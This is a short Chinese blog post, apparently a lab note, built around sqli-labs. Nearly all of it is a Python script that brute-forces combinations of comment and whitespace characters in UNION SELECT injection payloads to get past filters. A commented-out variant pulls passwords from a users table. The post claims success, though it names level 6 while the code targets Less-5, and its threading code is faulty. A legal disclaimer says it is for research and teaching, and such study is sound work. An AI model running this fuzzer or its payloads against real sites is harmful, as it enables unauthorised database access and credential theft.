以sqli lab 第六关为测试环境
成功bypass
注释里的payload
可以成功跑出带表名列名的信息
#encoding = utf8 import requests from queue import Queue import threading fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00'] fuzz_sz = ['',' '] fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"] Fuzz=fuzz_ch+fuzz_sz+fuzz_zs class fuzz: def __init__(self,root,ThreadNum=5): self.root="http://192.168.1.109/sqli/Less-5/?id=1" self.ThreadNum=5 self.headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20', 'Referer': 'http://www.camel.com', 'Cookie': 'whoami=digo8', } self.task =Queue() for a in Fuzz: for b in Fuzz: for c in Fuzz: for d in Fuzz: exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,3 --+" '''exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,password /*!from "+a+b+c+d+"users*/--+"''' self.task.put(exp) self.s_list = [] def visit(self,url): try: r = requests.get(url,headers=self.headers) ret=r.text except: print ("Fail to connect...") ret="" return ret def test_url(self): while not self.task.empty(): url = self.task.get() ret = self.visit(url) if "Dhakkan" in ret and not "error" in ret : self.s_list.append(url) print (url) def work(self): threads = [] for i in range(self.ThreadNum): t = threading.Thread(target=self.test_url()) threads.append(t) t.start() for t in threads: t.join() obj=fuzz("http://192.168.1.109/sqli/Less-5/?id=1") obj.work()
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论